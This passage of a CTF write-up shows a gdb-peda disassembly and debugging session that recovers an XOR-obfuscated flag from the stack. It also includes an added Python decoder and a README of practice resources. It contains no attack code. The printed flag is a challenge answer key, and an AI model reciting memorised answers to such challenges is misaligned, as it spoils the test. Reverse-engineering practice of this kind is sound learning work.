23 | 0x00005555555546b7 <+23>: mov rbx,0x2d
24 | 0x00005555555546be <+30>: xor rax,rbx
25 | 0x00005555555546c1 <+33>: push rax
26 | 0x00005555555546c2 <+34>: mov rax,0xc1
27 | 0x00005555555546c9 <+41>: mov rbx,0xb8
28 | 0x00005555555546d0 <+48>: xor rax,rbx
29 | 0x00005555555546d3 <+51>: push rax
30 | 0x00005555555546d4 <+52>: mov rax,0x51
31 | 0x00005555555546db <+59>: mov rbx,0x60
32 | 0x00005555555546e2 <+66>: xor rax,rbx
33 | 0x00005555555546e5 <+69>: push rax
34 | 0x00005555555546e6 <+70>: mov rax,0x33
35 | 0x00005555555546ed <+77>: mov rbx,0x51
36 | 0x00005555555546f4 <+84>: xor rax,rbx
37 | 0x00005555555546f7 <+87>: push rax
38 | 0x00005555555546f8 <+88>: mov rax,0x45
39 | 0x00005555555546ff <+95>: mov rbx,0x28
40 | 0x0000555555554706 <+102>: xor rax,rbx
41 | 0x0000555555554709 <+105>: push rax
42 | 0x000055555555470a <+106>: mov rax,0x9b
43 | 0x0000555555554711 <+113>: mov rbx,0xa8
44 | 0x0000555555554718 <+120>: xor rax,rbx
45 | 0x000055555555471b <+123>: push rax
46 | 0x000055555555471c <+124>: mov rax,0x71
47 | 0x0000555555554723 <+131>: mov rbx,0x2
48 | 0x000055555555472a <+138>: xor rax,rbx
49 | 0x000055555555472d <+141>: push rax
50 | 0x000055555555472e <+142>: mov rax,0x8b
51 | 0x0000555555554735 <+149>: mov rbx,0xd8
52 | 0x000055555555473c <+156>: xor rax,rbx
53 | 0x000055555555473f <+159>: push rax
54 | 0x0000555555554740 <+160>: mov rax,0x98
55 | 0x0000555555554747 <+167>: mov rbx,0xac
56 | 0x000055555555474e <+174>: xor rax,rbx
57 | 0x0000555555554751 <+177>: push rax
58 | 0x0000555555554752 <+178>: mov rax,0x8e
59 | 0x0000555555554759 <+185>: mov rbx,0xd1
60 | 0x0000555555554760 <+192>: xor rax,rbx
61 | 0x0000555555554763 <+195>: push rax
62 | 0x0000555555554764 <+196>: mov rax,0x66
63 | 0x000055555555476b <+203>: mov rbx,0x8
64 | 0x0000555555554772 <+210>: xor rax,rbx
65 | 0x0000555555554775 <+213>: push rax
66 | 0x0000555555554776 <+214>: mov rax,0xa9
67 | 0x000055555555477d <+221>: mov rbx,0x98
68 | 0x0000555555554784 <+228>: xor rax,rbx
69 | 0x0000555555554787 <+231>: push rax
70 | 0x0000555555554788 <+232>: mov rax,0x65
71 | 0x000055555555478f <+239>: mov rbx,0x3a
72 | 0x0000555555554796 <+246>: xor rax,rbx
73 | 0x0000555555554799 <+249>: push rax
74 | 0x000055555555479a <+250>: mov rax,0x7e
75 | 0x00005555555547a1 <+257>: mov rbx,0x4d
76 | 0x00005555555547a8 <+264>: xor rax,rbx
77 | 0x00005555555547ab <+267>: push rax
78 | 0x00005555555547ac <+268>: mov rax,0x10
79 | 0x00005555555547b3 <+275>: mov rbx,0x74
80 | 0x00005555555547ba <+282>: xor rax,rbx
81 | 0x00005555555547bd <+285>: push rax
82 | 0x00005555555547be <+286>: mov rax,0x6b
83 | 0x00005555555547c5 <+293>: mov rbx,0x5b
84 | 0x00005555555547cc <+300>: xor rax,rbx
85 | 0x00005555555547cf <+303>: push rax
86 | 0x00005555555547d0 <+304>: mov rax,0x98
87 | 0x00005555555547d7 <+311>: mov rbx,0xfb
88 | 0x00005555555547de <+318>: xor rax,rbx
89 | 0x00005555555547e1 <+321>: push rax
90 | 0x00005555555547e2 <+322>: mov rax,0xc5
91 | 0x00005555555547e9 <+329>: mov rbx,0x9a
92 | 0x00005555555547f0 <+336>: xor rax,rbx
93 | 0x00005555555547f3 <+339>: push rax
94 | 0x00005555555547f4 <+340>: mov rax,0x37
95 | 0x00005555555547fb <+347>: mov rbx,0x44
96 | 0x0000555555554802 <+354>: xor rax,rbx
97 | 0x0000555555554805 <+357>: push rax
98 | 0x0000555555554806 <+358>: mov rax,0x92
99 | 0x000055555555480d <+365>: mov rbx,0xf6
100 | 0x0000555555554814 <+372>: xor rax,rbx
101 | 0x0000555555554817 <+375>: push rax
102 | 0x0000555555554818 <+376>: mov rax,0x44
103 | 0x000055555555481f <+383>: mov rbx,0xa
104 | 0x0000555555554826 <+390>: xor rax,rbx
105 | 0x0000555555554829 <+393>: push rax
106 | 0x000055555555482a <+394>: mov rax,0x80
107 | 0x0000555555554831 <+401>: mov rbx,0xe5
108 | 0x0000555555554838 <+408>: xor rax,rbx
109 | 0x000055555555483b <+411>: push rax
110 | 0x000055555555483c <+412>: mov rax,0xc8
111 | 0x0000555555554843 <+419>: mov rbx,0xaf
112 | 0x000055555555484a <+426>: xor rax,rbx
113 | 0x000055555555484d <+429>: push rax
114 | 0x000055555555484e <+430>: mov rax,0x26
115 | 0x0000555555554855 <+437>: mov rbx,0x15
116 | 0x000055555555485c <+444>: xor rax,rbx
117 | 0x000055555555485f <+447>: push rax
118 | 0x0000555555554860 <+448>: mov rax,0x3e
119 | 0x0000555555554867 <+455>: mov rbx,0x52
120 | 0x000055555555486e <+462>: xor rax,rbx
121 | 0x0000555555554871 <+465>: push rax
122 | 0x0000555555554872 <+466>: mov rax,0x9a
123 | 0x0000555555554879 <+473>: mov rbx,0xe1
124 | 0x0000555555554880 <+480>: xor rax,rbx
125 | 0x0000555555554883 <+483>: push rax
126 | 0x0000555555554884 <+484>: mov rax,0x13
127 | 0x000055555555488b <+491>: mov rbx,0x75
128 | 0x0000555555554892 <+498>: xor rax,rbx
129 | 0x0000555555554895 <+501>: push rax
130 | 0x0000555555554896 <+502>: mov rax,0xa2
131 | 0x000055555555489d <+509>: mov rbx,0xd6
132 | 0x00005555555548a4 <+516>: xor rax,rbx
133 | 0x00005555555548a7 <+519>: push rax
134 | 0x00005555555548a8 <+520>: mov rax,0xbe
135 | 0x00005555555548af <+527>: mov rbx,0xdd
136 | 0x00005555555548b6 <+534>: xor rax,rbx
137 | 0x00005555555548b9 <+537>: push rax
138 | 0x00005555555548ba <+538>: mov rax,0xac
139 | 0x00005555555548c1 <+545>: mov rbx,0xdc
140 | 0x00005555555548c8 <+552>: xor rax,rbx
141 | 0x00005555555548cb <+555>: push rax
142 | 0x00005555555548cc <+556>: call 0x555555554560
143 | 0x00005555555548d1 <+561>: mov eax,0x0
144 | 0x00005555555548d6 <+566>: add rsp,0xf0
145 | 0x00005555555548dd <+573>: pop rbp
146 | 0x00005555555548de <+574>: ret
147 | End of assembler dump.
148 | gdb-peda$ break main
149 | Breakpoint 1 at 0x5555555546a4
150 | gdb-peda$ break *0x00005555555548d1
151 | Breakpoint 2 at 0x5555555548d1
152 | gdb-peda$ run
153 | Starting program: /home/valle/Downloads/question
154 |
155 | [----------------------------------registers-----------------------------------]
156 | RAX: 0x5555555546a0 (: push rbp)
157 | RBX: 0x0
158 | RCX: 0x0
159 | RDX: 0x7fffffffe168 --> 0x7fffffffe47a ("LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc"...)
160 | RSI: 0x7fffffffe158 --> 0x7fffffffe45b ("/home/valle/Downloads/question")
161 | RDI: 0x1
162 | RBP: 0x7fffffffe070 --> 0x5555555548e0 (<__libc_csu_init>: push r15)
163 | RSP: 0x7fffffffe070 --> 0x5555555548e0 (<__libc_csu_init>: push r15)
164 | RIP: 0x5555555546a4 (: lea rdi,[rip+0x2b9] # 0x555555554964)
165 | R8 : 0x555555554950 (<__libc_csu_fini>: repz ret)
166 | R9 : 0x7ffff7de8cb0 (<_dl_fini>: push rbp)
167 | R10: 0x4
168 | R11: 0x1
169 | R12: 0x555555554570 (<_start>: xor ebp,ebp)
170 | R13: 0x7fffffffe150 --> 0x1
171 | R14: 0x0
172 | R15: 0x0
173 | EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
174 | [-------------------------------------code-------------------------------------]
175 | 0x55555555469b : jmp 0x5555555545e0
176 | 0x5555555546a0 : push rbp
177 | 0x5555555546a1 : mov rbp,rsp
178 | => 0x5555555546a4 : lea rdi,[rip+0x2b9] # 0x555555554964
179 | 0x5555555546ab : mov eax,0x0
180 | 0x5555555546b0 : mov rax,0x50
181 | 0x5555555546b7 : mov rbx,0x2d
182 | 0x5555555546be : xor rax,rbx
183 | [------------------------------------stack-------------------------------------]
184 | 0000| 0x7fffffffe070 --> 0x5555555548e0 (<__libc_csu_init>: push r15)
185 | 0008| 0x7fffffffe078 --> 0x7ffff7a5a2b1 (<__libc_start_main+241>: mov edi,eax)
186 | 0016| 0x7fffffffe080 --> 0x40000
187 | 0024| 0x7fffffffe088 --> 0x7fffffffe158 --> 0x7fffffffe45b ("/home/valle/Downloads/question")
188 | 0032| 0x7fffffffe090 --> 0x1f7b9b2e8
189 | 0040| 0x7fffffffe098 --> 0x5555555546a0 (: push rbp)
190 | 0048| 0x7fffffffe0a0 --> 0x0
191 | 0056| 0x7fffffffe0a8 --> 0x9ad5913901955e19
192 | [------------------------------------------------------------------------------]
193 | Legend: code, data, rodata, value
194 |
195 | Breakpoint 1, 0x00005555555546a4 in main ()
196 | gdb-peda$ c
197 | Continuing.
198 | Look for something else....
199 |
200 |
201 |
202 |
203 |
204 |
205 |
206 |
207 |
208 | [----------------------------------registers-----------------------------------]
209 | RAX: 0x1c
210 | RBX: 0xdc
211 | RCX: 0x7ffff7b15760 (<__write_nocancel+7>: cmp rax,0xfffffffffffff001)
212 | RDX: 0x7ffff7dd5760 --> 0x0
213 | RSI: 0x555555756010 ("Look for something else....\n")
214 | RDI: 0x555555756010 ("Look for something else....\n")
215 | RBP: 0x7fffffffe070 --> 0x5555555548e0 (<__libc_csu_init>: push r15)
216 | RSP: 0x7fffffffdf80 --> 0x70 ('p')
217 | RIP: 0x5555555548d1 (: mov eax,0x0)
218 | R8 : 0x555555756000 --> 0x0
219 | R9 : 0x1c
220 | R10: 0x7ffff7dd3b58 --> 0x555555756410 --> 0x0
221 | R11: 0x246
222 | R12: 0x555555554570 (<_start>: xor ebp,ebp)
223 | R13: 0x7fffffffe150 --> 0x1
224 | R14: 0x0
225 | R15: 0x0
226 | EFLAGS: 0x206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
227 | [-------------------------------------code-------------------------------------]
228 | 0x5555555548c8 : xor rax,rbx
229 | 0x5555555548cb : push rax
230 | 0x5555555548cc : call 0x555555554560
231 | => 0x5555555548d1 : mov eax,0x0
232 | 0x5555555548d6 : add rsp,0xf0
233 | 0x5555555548dd : pop rbp
234 | 0x5555555548de : ret
235 | 0x5555555548df: nop
236 | [------------------------------------stack-------------------------------------]
237 | 0000| 0x7fffffffdf80 --> 0x70 ('p')
238 | 0008| 0x7fffffffdf88 --> 0x63 ('c')
239 | 0016| 0x7fffffffdf90 --> 0x74 ('t')
240 | 0024| 0x7fffffffdf98 --> 0x66 ('f')
241 | 0032| 0x7fffffffdfa0 --> 0x7b ('{')
242 | 0040| 0x7fffffffdfa8 --> 0x6c ('l')
243 | 0048| 0x7fffffffdfb0 --> 0x33 ('3')
244 | 0056| 0x7fffffffdfb8 --> 0x67 ('g')
245 | [------------------------------------------------------------------------------]
246 | Legend: code, data, rodata, value
247 |
248 | Breakpoint 2, 0x00005555555548d1 in main ()
249 |
250 | 0x7fffffffdff0: 0x00000030 0x00000000
251 | gdb-peda$ x/30ws 0x7fffffffdf80
252 | 0x7fffffffdf80: U"p"
253 | 0x7fffffffdf88: U"c"
254 | 0x7fffffffdf90: U"t"
255 | 0x7fffffffdf98: U"f"
256 | 0x7fffffffdfa0: U"{"
257 | 0x7fffffffdfa8: U"l"
258 | 0x7fffffffdfb0: U"3"
259 | 0x7fffffffdfb8: U"g"
260 | 0x7fffffffdfc0: U"e"
261 | 0x7fffffffdfc8: U"N"
262 | 0x7fffffffdfd0: U"d"
263 | 0x7fffffffdfd8: U"s"
264 | 0x7fffffffdfe0: U"_"
265 | 0x7fffffffdfe8: U"c"
266 | 0x7fffffffdff0: U"0"
267 | 0x7fffffffdff8: U"d"
268 | 0x7fffffffe000: U"3"
269 | 0x7fffffffe008: U"_"
270 | 0x7fffffffe010: U"1"
271 | 0x7fffffffe018: U"n"
272 | 0x7fffffffe020: U"_"
273 | 0x7fffffffe028: U"4"
274 | 0x7fffffffe030: U"S"
275 | 0x7fffffffe038: U"s"
276 | 0x7fffffffe040: U"3"
277 | 0x7fffffffe048: U"m"
278 | 0x7fffffffe050: U"b"
279 | 0x7fffffffe058: U"1"
280 | 0x7fffffffe060: U"y"
281 | 0x7fffffffe068: U"}"
282 | ~~~
283 |
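As an added example (not part of the writeup), the same flag recovered statically from the listing: the 30 `mov rax / mov rbx / xor rax,rbx / push rax` groups are XORed and read back in reverse push order, which is the order `x/30ws` shows because every push lands 8 bytes below the previous one. PAIRS is copied from the pdisass output above; SAMPLE is a constructed excerpt to exercise the parser, and the function names are this example's own.

```python
import re

# (rax, rbx) immediates of the 30 "mov rax / mov rbx / xor rax,rbx / push rax"
# groups in main, copied from the pdisass listing above, in push order.
PAIRS = [
    (0x50, 0x2d), (0xc1, 0xb8), (0x51, 0x60), (0x33, 0x51), (0x45, 0x28),
    (0x9b, 0xa8), (0x71, 0x02), (0x8b, 0xd8), (0x98, 0xac), (0x8e, 0xd1),
    (0x66, 0x08), (0xa9, 0x98), (0x65, 0x3a), (0x7e, 0x4d), (0x10, 0x74),
    (0x6b, 0x5b), (0x98, 0xfb), (0xc5, 0x9a), (0x37, 0x44), (0x92, 0xf6),
    (0x44, 0x0a), (0x80, 0xe5), (0xc8, 0xaf), (0x26, 0x15), (0x3e, 0x52),
    (0x9a, 0xe1), (0x13, 0x75), (0xa2, 0xd6), (0xbe, 0xdd), (0xac, 0xdc),
]

# constructed excerpt of the listing (first two groups) to exercise the parser
SAMPLE = """\
   0x00005555555546b0 <+16>:    mov    rax,0x50
   0x00005555555546b7 <+23>:    mov    rbx,0x2d
   0x00005555555546be <+30>:    xor    rax,rbx
   0x00005555555546c1 <+33>:    push   rax
   0x00005555555546c2 <+34>:    mov    rax,0xc1
   0x00005555555546c9 <+41>:    mov    rbx,0xb8
   0x00005555555546d0 <+48>:    xor    rax,rbx
   0x00005555555546d3 <+51>:    push   rax
"""

# one group in gdb/peda Intel syntax; each instruction must be on the line
# right after the previous one, addresses and <+off> tags are ignored
GROUP_RE = re.compile(
    r"mov\s+rax,0x([0-9a-f]+)\s*\n.*?mov\s+rbx,0x([0-9a-f]+)\s*\n"
    r".*?xor\s+rax,rbx\s*\n.*?push\s+rax",
    re.IGNORECASE,
)


def parse_listing(disasm):
    """Pull the (rax, rbx) pairs out of a disassembly dump, in push order."""
    return [(int(a, 16), int(b, 16)) for a, b in GROUP_RE.findall(disasm)]


def decode_pushes(pairs):
    """Each push stores one byte (zero-extended to 8 bytes) at a lower address
    than the previous one, so reading memory upward from rsp, as x/30ws did,
    yields the characters in reverse push order."""
    pushed = [a ^ b for a, b in pairs]
    return "".join(chr(c) for c in reversed(pushed))


if __name__ == "__main__":
    print(parse_listing(SAMPLE))          # [(80, 45), (193, 184)]
    print(decode_pushes(PAIRS))           # the flag, as x/30ws showed it
```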
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # writeups
2 | Solutions from multiple CTFs we have played.
3 |
4 | # Resources
5 |
6 | ## General practice
7 |
8 | * http://ctftime.org/
9 | * http://hackthebox.eu/
10 | * https://www.vulnhub.com/
11 | * http://pwnable.kr/
12 | * https://hack.me
13 | * http://root-me.org/
14 |
15 | ### Reverse Engineering
16 |
17 | * The Shellcoder's Handbook
18 | * Hacking: The Art of Exploitation
19 | * https://exploit-exercises.com/nebula
20 | * http://pwnable.kr/
21 |
22 | ### Web
23 |
24 | * The Web Application Hacker's Handbook
25 | * https://www.owasp.org/index.php/Web_Application_Security_Testing_Cheat_Sheet
26 | * https://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project
27 | * https://xss-game.appspot.com/
28 | * https://hack.me/t/XSS
29 |
30 | ### Crypto
31 |
32 | * http://cryptopals.com/
33 | * https://www.coursera.org/learn/crypto
34 |
--------------------------------------------------------------------------------